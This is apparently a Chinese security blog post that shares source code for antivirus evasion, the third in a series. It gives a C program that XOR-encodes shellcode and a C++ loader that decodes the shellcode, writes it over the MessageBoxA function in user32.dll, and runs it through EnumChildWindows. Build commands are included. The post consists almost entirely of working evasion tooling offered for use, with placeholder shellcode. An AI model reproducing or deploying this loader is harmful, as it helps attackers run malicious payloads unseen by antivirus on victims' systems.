额~你们要的免杀(三)的源码在这里~
蓝极战队公众号原文在这里
别再发邮件问我要源码了,源码如下:
0x01 异或shellcode
#include<stdio.h>
unsigned char buf[] = "shellcode";
int main() {
int i;
printf("en_shellcode is:\n");
for(i=0; i<=sizeof(buf); i++) {
buf[i]=buf[i] ^ 0x15;
printf("\\x%x",buf[i]);
}
}编译执行即可
gcc xorsc.c -o xorsc ./xorsc
0x02 劫持windows导出函数替换函数并执行
#include <iostream>
#include <Windows.h>
#define FunctionName "MessageBoxA"
BOOL WirtePayload(PVOID Address, PBYTE shellcode, SIZE_T shellcodeSize) {
DWORD dOld = NULL;
if (!VirtualProtect(Address, shellcodeSize, PAGE_READWRITE, &dOld)) {
return FALSE;
};
memcpy(Address, shellcode, shellcodeSize);
if (!VirtualProtect(Address, shellcodeSize, PAGE_EXECUTE_READWRITE, &dOld)) {
return FALSE;
}
return TRUE;
}
int main()
{
unsigned char shellcode[] = {"异或后的shellcode"};
PVOID pAddress = NULL;
HMODULE hmodule = NULL;
hmodule = LoadLibraryA("user32.dll");
if (hmodule == NULL) {
return -1;
}
pAddress = GetProcAddress(hmodule, FunctionName);
if (pAddress == NULL) {
return -1;
}
int i;
for (i = 0; i <= sizeof(shellcode); i++) {
shellcode[i] = shellcode[i] ^ 0x15;
}
if (!WirtePayload(pAddress, shellcode, sizeof(shellcode))) {
return -1;
};
EnumChildWindows(NULL, (WNDENUMPROC)pAddress, NULL);
}g++或者使用Visual Studio编译均可~~~~
欢迎关注蓝极战队公众号,这里只是我的小窝,学习技术哪家强?还是要看蓝极战队公众号!!!
本文链接:http://zngeek.com/znblog/post/4.html 转载请注明出处~~~~~~
3 条评论
发表评论